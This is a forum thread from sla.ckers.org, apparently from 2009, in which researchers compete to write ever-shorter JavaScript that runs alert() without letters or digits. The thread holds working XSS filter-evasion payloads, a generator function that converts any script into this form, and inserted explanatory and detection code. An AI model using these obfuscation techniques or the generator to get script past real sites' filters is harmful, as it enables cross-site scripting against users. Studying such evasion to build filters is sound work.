Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 06:32AM

Updated it to be shorter

$=[][(!~''+'')[(+!'')+(+!'')+(+!'')]+({}+'')[+!'']+($$=(!+''+'')[+!''])+(_=(!''+'')[+''])],$()[(!!''+'')[+!'']+(!!''+'')[+!''+!'']+(!!''+'')[+!''+!''+!''+!'']+$$+_](+!'')

Hit execute output for demo

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#JD1bXVsoIX4nJysnJylbKCshISckJykrKCshISckJykrKCshISckJyldKyh7fSsnJylbKyEhJyQnXSsoPEBmcm9tY2hhcmNvZGVzXzA%2BMTAwMTxAL2Zyb21jaGFyY29kZXNfMD49KCErJycrJycpWyshISckJ10pKyhfPSghJycrJycpWysnJ10pXSwkKClbKCEhJycrJycpWyshISckJ10rKCEhJycrJycpWyshISckJyshISckJ10rKCEhJycrJycpWyshISckJyshISckJyshISckJyshISckJ10rPEBmcm9tY2hhcmNvZGVzXzE%2BMTAwMTxAL2Zyb21jaGFyY29kZXNfMT4rX10oKyEhJyQnKQ%3D%3D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 8 time(s). Last edit at 06/02/2009 09:52AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 08:48AM

Andrea Giammarchi came up with this cross browser xD :-

$=''|'',_=$+!"",__=_+_,___=__+_,($)[_$=($$=(_$=""+{})[__+__+_])+_$[_]+(""+_$[-__])[_]+(""+!_)[___]+($_=(_$=""+!$)[$])+_$[_]+_$[__]+$$+$_+(""+{})[_]+_$[_]][_$]((_$=""+!_)[_]+_$[__]+_$[__+__]+(_$=""+!$)[_]+_$[$]+"("+_+")")();

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 03:44PM

Yosuke HASEGAWA has his own Hackvertor tag. Yes Hackvertor now generates non-ascii code. Thanks to sdc for helping with the concept and providing some nice shortcuts for the numbers.

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 02, 2009 10:35PM

then I realized that the numbers could be shortened another 2 bytes.. 1=3/3, so you can do 1 with $/$ haha.. so well..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 03, 2009 03:56AM

ok, I've modified gareth's function to a simplified one..

this one should create smaller output code (Hackvertor's does Function("return char")() for each letter.. and that makes source code toooo large).

function toNonAscii(str){return "$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$$='\\\\'+(!''+'')[$$]+($-$)+($-$);$$$$$$$=''+(!''+'')[$/$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+(!''+'')[$/$]+([].$+'')[$/$];$$$$$($$$$$($$$$$$$+$$$$$($$$$$$$+'\\''+$$$$$$+$$+($-$)+$$$$$$+($$+$)+$+(!''+'')[$-$]+(!''+'')[$/$]+$$$$$$+($+$)+($*$)+([].$+'')[$/$]+$$$$$$+($+$)+$$$+$$$$$$+$$+(!''+'')[$]+$$$$$$+($+$)+($+$)+(!''+'')[$/$]+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+([].$+'')[$$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+($$$$)+$$$$$$+($+$)+($/$)+(!''+'')[$/$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+($$+$$)+(!''+'')[$]+'\\'')())()("+str.replace(/./g,function(c){return ",''"+(""+c.charCodeAt()).replace(/./g,function(d){return "+"+["($-$)","$/$","$$","$","$$*$$","($$+$)","$*$$","$$$","$$$$","$*$"][d];})}).slice(1)+"))();";}

try..

toNonAscii('alert("cool code")');

creates:

$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$$='\\'+(!''+'')[$$]+($-$)+($-$);$$$$$$$=''+(!''+'')[$/$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+(!''+'')[$/$]+([].$+'')[$/$];$$$$$($$$$$($$$$$$$+$$$$$($$$$$$$+'\''+$$$$$$+$$+($-$)+$$$$$$+($$+$)+$+(!''+'')[$-$]+(!''+'')[$/$]+$$$$$$+($+$)+($*$)+([].$+'')[$/$]+$$$$$$+($+$)+$$$+$$$$$$+$$+(!''+'')[$]+$$$$$$+($+$)+($+$)+(!''+'')[$/$]+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+([].$+'')[$$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+($$$$)+$$$$$$+($+$)+($/$)+(!''+'')[$/$]+$$$$$$+($$+$$)+$+$$$$$$+($+$)+(![]+'')[$-$]+$$$$$$+($+$)+($$+$$)+(!''+'')[$]+'\'')())()(''+$*$+$$$,''+$/$+($-$)+$$$$,''+$/$+($-$)+$/$,''+$/$+$/$+$$*$$,''+$/$+$/$+$*$$,''+$$*$$+($-$),''+$+$$*$$,''+$*$+$*$,''+$/$+$/$+$/$,''+$/$+$/$+$/$,''+$/$+($-$)+$$$$,''+$+$$,''+$*$+$*$,''+$/$+$/$+$/$,''+$/$+($-$)+($-$),''+$/$+($-$)+$/$,''+$+$$*$$,''+$$*$$+$/$,''+($$+$)+$*$))();

and hackvertor makes:

$$=-~-~[],$=-~$$,$$$$=$$<<$$,$$$=$$$$+~[];$$$$$=($-$)[$$$$$$=(''+{})[$$+$]+(''+{})[$-$$]+([].$+'')[$-$$]+(!!''+'')[$]+({}+'')[$+$]+(!''+'')[$-$$]+(!''+'')[$$]+(''+{})[$$+$]+({}+'')[$+$]+(''+{})[$-$$]+(!''+'')[$-$$]][$$$$$$];$$$$$($$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($-$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($+$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$)+($-$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($-$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$
+'')[$-$$]+'\''+'\\'+($-$$)+($$+$)+($$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($-$$)+($$+$$)+($$+$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$$)+($$)+'\'')()+$$$$$((!''+'')[$-$$]+(!''+'')[$]+(!''+'')[$-$]+(!''+'')[$$]+((!''+''))[$-$$]+([].$+'')[$-$$]+'\''+'\\'+($$+$)+($-$$)+'\'')())()

so well.. :P it's important to say that if you want the last call to return something, you have to do: "return 1;" so for example.

eval(toNonAscii("return alert"))('123');

alerts 123

so well.. HASEGAWA is my new god I think..

Greetz!




Edited 1 time(s). Last edit at 06/03/2009 03:57AM by sirdarckcat.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 04:06AM

Mine is more confusing :)

Maybe we should have two tags...




Edited 1 time(s). Last edit at 06/03/2009 04:07AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 04:35AM

I dunno why but I just realized that Hackvertor can double/triple... encode the non-alpha code generation haha

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8xPjxAaGFzZWdhd2FfMD5hbGVydCgiTE9MISIpPEAvaGFzZWdhd2FfMD48QC9oYXNlZ2F3YV8xPg%3D%3D

good luck decoding that

Re: New XSS vectors/Unusual Javascript
Posted by: holiman
Date: June 03, 2009 05:06AM

> -----------------------------
> _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+
> ({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)
> +"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+""
> )[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")
> [_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+
> ({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];
> ($)[$$][$$]($$$+"('"+$_$+"')")();


Wow. Me too stupid. Could anyone pls explain that ^^ ?

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 03, 2009 08:32AM

@holiman: It looks complicated but is actually very easy. Since you are not allowed to use alnum characters you have to generate them.

_=''+{}

The code above for example results in the string [object Object]. Now you can access the string like an array.

_[1]
//<- gives you an o, index 2 a b, 3 a j etc etc.

Since the 1 is not allowed either, you have to generate it as well. $>>$ for example will give you a 0, $++ a 1, $+$ afterwards a two and so on. With some patience you can assemble the string 'alert(1)' this way. Last but not least you have to evaluate the string. One way to do this w/o alnum would be to create the string __parent__ and use it as array index for one of the variables you created before. Boom - you have the window object and thus the ability to eval().

See - easy :)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 08:41AM

Mine and sdc's method uses Function to generate any characters. We return octal escaped strings to get the char we want and pass numbers to it.

e.g.
new Function("return '\141'")();

Which returns "a", we have to generate the constructor first in order to get the Function. Like so:-
(0).constructor.constructor == Function

So you use mario's explanation to generate each char like "c", "o" etc then instead of returning \141 you just make the numbers using the technique.

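The building blocks described in the two explanations above, written out readably for anyone who has to read such payloads. This is an added example, not code from any poster: it shows which letters plain coercion can reach, that "p" is not among them, and how Function plus an octal escape fills that gap. The names SOURCES, spell, missing, assemble, functionViaConstructor and charViaOctal are illustrative.

```javascript
// Added example (not from the thread): the coercion building blocks in readable form.
// Strings obtainable without typing a letter or digit, using forms seen in the posts.
const SOURCES = [
  ["''+{}",   '' + {}],    // "[object Object]"
  ["!''+''",  !'' + ''],   // "true"
  ["!!''+''", !!'' + ''],  // "false"
  ["[].$+''", [].$ + ''],  // "undefined" (missing property coerced to a string)
];

// Small integers from coercion, used as string indexes in the payloads.
const ZERO = +'';        // empty string -> 0
const ONE = +!'';        // !'' is true, +true -> 1
const THREE = -~-~-~[];  // each -~ adds one, starting from ~[] === -1

// For each character of `word`, find a source string and index that yields it.
function spell(word) {
  return [...word].map((ch) => {
    for (const [expr, str] of SOURCES) {
      const index = str.indexOf(ch);
      if (index !== -1) return { ch, expr, index };
    }
    return { ch, expr: null, index: -1 };
  });
}

// Letters/digits of `word` that indexing cannot produce.
// Punctuation such as "_" is ignored because it can be typed literally.
function missing(word) {
  const gaps = spell(word).filter((s) => s.expr === null && /[a-zA-Z0-9]/.test(s.ch));
  return [...new Set(gaps.map((s) => s.ch))];
}

// Rebuild a word purely from indexed lookups; throws if a character is unreachable.
function assemble(word) {
  return spell(word).map((s) => {
    if (s.expr === null) throw new Error('unreachable: ' + s.ch);
    return SOURCES.find(([expr]) => expr === s.expr)[1][s.index];
  }).join('');
}

// (0).constructor is Number, and Number.constructor is Function.
function functionViaConstructor() {
  const key = assemble('constructor');
  return (0)[key][key];
}

// Any Latin-1 character from its code, via an octal escape evaluated by Function.
function charViaOctal(ch) {
  const F = functionViaConstructor();
  return F("return '\\" + ch.charCodeAt(0).toString(8) + "'")();
}
```
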
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 03, 2009 08:55AM

@Gareth The constructor trick is damn cool!

(0).constructor.constructor('return alert("\141")')()

Too bad the p is hard to generate using my way because _['__parent__']['alert'](1) would have been a very short way to do the alert :)



Edited 1 time(s). Last edit at 06/03/2009 09:01AM by .mario.

Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 03, 2009 08:57AM

Too bad these do not seem to work in IE 7.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 09:01AM

@matt

yeah I had this discussion with someone else :(
String indexes are the problem.

BTW, earlier versions of IE8 didn't have string indexing. So some versions of IE8 won't work with it either.

@mario

Yeah it rocks :) especially concatenating strings of numbers to generate chars haha




Edited 1 time(s). Last edit at 06/03/2009 09:08AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Date: June 03, 2009 09:40AM

Thanks all.
I'm unduly impressed by Hackvertor.

The next story is character-encoding polyglot JavaScript.

The script source is here: http://utf-8.jp/joke/detectenc.js.txt

The detectCharSet() function determines its own charset.

For example, code like the following shows "UTF-8".
<script src="detectenc.js.txt" charset="utf-8"></script>
<script>
alert( detectCharSet() );
</script>

And code like the following shows "Shift_JIS".
<script src="detectenc.js.txt" charset="Shift_JIS"></script>
<script>
alert( detectCharSet() );
</script>

Of course, the UTF-7 we love is also supported.
<script src="detectenc.js.txt" charset="UTF-7"></script>
<script>
alert( detectCharSet() );
</script>

A demo page to execute this script is here:
http://utf-8.jp/joke/detectenc.html

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 03, 2009 10:31AM

o=({'*':1,'@$':1,'@*':1});
alert(o.*+o.@$+o.@*)

and...

Number.prototype['*']=function(str) {
alert(str);
}
1..*(1)

OR
.1.*(1)

haha




Edited 2 time(s). Last edit at 06/03/2009 10:48AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 12:48AM

@Gareth:

Made this one a little smaller for you

Yours:
$=[][(!~''+'')[(+!'')+(+!'')+(+!'')]+({}+'')[+!'']+($$=(!+''+'')[+!''])+(_=(!''+'')[+''])],$()[(!!''+'')[+!'']+(!!''+'')[+!''+!'']+(!!''+'')[+!''+!''+!''+!'']+$$+_](+!'') - 170 chars

Mine:
$=[];$=[][(!$+'')[-~-~-~[]]+({}+'')[+!'']+ ($$=(!''+'')[+!'']) + (_=(!+''+'')[+''])],$()
[(!$+'')[+!'']+(!$+'')[-~-~[]]+(!''+'')[-~-~-~[]]+$$+_](+!'') - 150 chars

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 02:34AM

@matt

sweet now I wonder if I can make it smaller :)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 03:01AM

$=[];$=[][(!$+'')[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+'')[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'')

137!

136! LOL

$=[$=[]][(!$+'')[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+'')[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'')




Edited 1 time(s). Last edit at 06/04/2009 04:15AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 03:07AM

gareth, matt:
both of your codes return..
TypeError: $()[(!$ + "")[+ !""] + (!$ + "")[- ~- ~[]] + (!"" + "")[- ~- ~- ~[]] + $$ + _] is not a function

and that makes sense..

[].sort().alert(1)?? wtf?

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 03:13AM

@sirdarckcat

Only works in FF and sort gets window :)

x=[].sort,x() === window




Edited 1 time(s). Last edit at 06/04/2009 03:14AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 03:20AM

ah true.. in firebug your codes don't work hehe... that's why I was confused.

(ohhh you are cheating, using _ matches as a word char..)




Edited 1 time(s). Last edit at 06/04/2009 03:21AM by sirdarckcat.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 04:01AM

alphanumeric === a-zA-Z0-9

:P

Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 08:09AM

$=[$=[]][(!$+$)[-~-~-~$]+({}+$)[+!'']+($$=(!''+$)[+!''])+(_=(!+$+$)[+$])],$()[(!$+$)[+!'']+(!$+$)[-~-~$]+(!''+'')[-~-~-~$]+$$+_](+!'') - 134 chars

Re: New XSS vectors/Unusual Javascript
Posted by: sirdarckcat
Date: June 04, 2009 08:13AM

ok, you want to play like that, lets play like that.

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+($_)[+$])],$()[(__)[_/_]+(__)[_+~$]+($_)[_]+$$](_/_)

114




Edited 1 time(s). Last edit at 06/04/2009 08:20AM by sirdarckcat.

Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: June 04, 2009 08:35AM

Nice.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 09:15AM

Very nice :)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 12:02PM

window['Event']['constructor']['__proto__']['__proto__']['__parent__']['_content'].alert(1)

Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 04, 2009 02:31PM

@sdc I did some homework for you :)

$=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])],$()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

or

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

106



Edited 1 time(s). Last edit at 06/04/2009 03:06PM by .mario.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 02:58PM

@mario

That's awesome, I didn't think that would be shortened

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 04, 2009 04:27PM

Ok now I'm cheating :) cheap shot I know. jeez anything to win haha

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[_/_]+(ª=($_=!''+$)[_/_]+$_[+$])])()[µ[_/_]+µ[_+~$]+$_[_]+ª](_/_)

101!

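The thread's competing definitions of "alphanumeric" (a-zA-Z0-9, the \w class that also counts "_", and Unicode letters such as µ and ª) decide whether a character-class input filter would have flagged each entry. The following added example, which is not code from any poster, profiles the 106- and 101-character entries as text only and applies a simple triage heuristic for coercion-style obfuscation; the names profile, triage and IDIOMS and the thresholds are assumptions made for illustration.

```javascript
// Added example (not from the thread). Payloads are inspected as text, never evaluated.
// Two entries copied from the posts above; \u00b5 is µ and \u00aa is ª.
const ENTRY_106 = "($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+($$=($_=!''+$)[_/_]+$_[+$])])()[__[_/_]+__[_+~$]+$_[_]+$$](_/_)";
const ENTRY_101 = "($=[$=[]][(\u00b5=!$+$)[_=-~-~-~$]+({}+$)[_/_]+(\u00aa=($_=!''+$)[_/_]+$_[+$])])()[\u00b5[_/_]+\u00b5[_+~$]+$_[_]+\u00aa](_/_)";

// Count characters under each definition of "alphanumeric" argued over in the thread.
function profile(code) {
  const count = (re) => (code.match(re) || []).length;
  return {
    length: code.length,
    asciiAlnum: count(/[a-zA-Z0-9]/g),       // strict a-zA-Z0-9
    wordChars: count(/\w/g),                 // \w is [A-Za-z0-9_], so "_" counts
    unicodeLetters: count(/\p{L}/gu),        // letters in any script, e.g. µ and ª
    symbols: count(/[^\p{L}\p{N}\s]/gu),     // everything that is not a letter, digit or space
  };
}

// Coercion idioms that recur in the thread's entries (constructed list, not exhaustive).
const IDIOMS = [
  /!''|!""|!\$|!\[\]/,     // boolean from an empty string, variable or array
  /\{\}\s*\+|\+\s*\{\}/,   // object coerced to "[object Object]"
  /-~|\+!/,                // small integers from bitwise/unary operators
  /\]\s*\[/,               // indexing straight into an expression result
];

// Triage for log review: mostly symbols AND at least two coercion idioms.
function triage(code) {
  const p = profile(code);
  const idioms = IDIOMS.filter((re) => re.test(code)).length;
  const symbolRatio = p.length === 0 ? 0 : p.symbols / p.length;
  return { ...p, idioms, symbolRatio, suspicious: idioms >= 2 && symbolRatio > 0.6 };
}
```

A filter that only rejects a-zA-Z0-9 passes both entries, a \w-based filter rejects both because of "_", and only a Unicode-aware letter class separates the 101-character entry from the 106-character one.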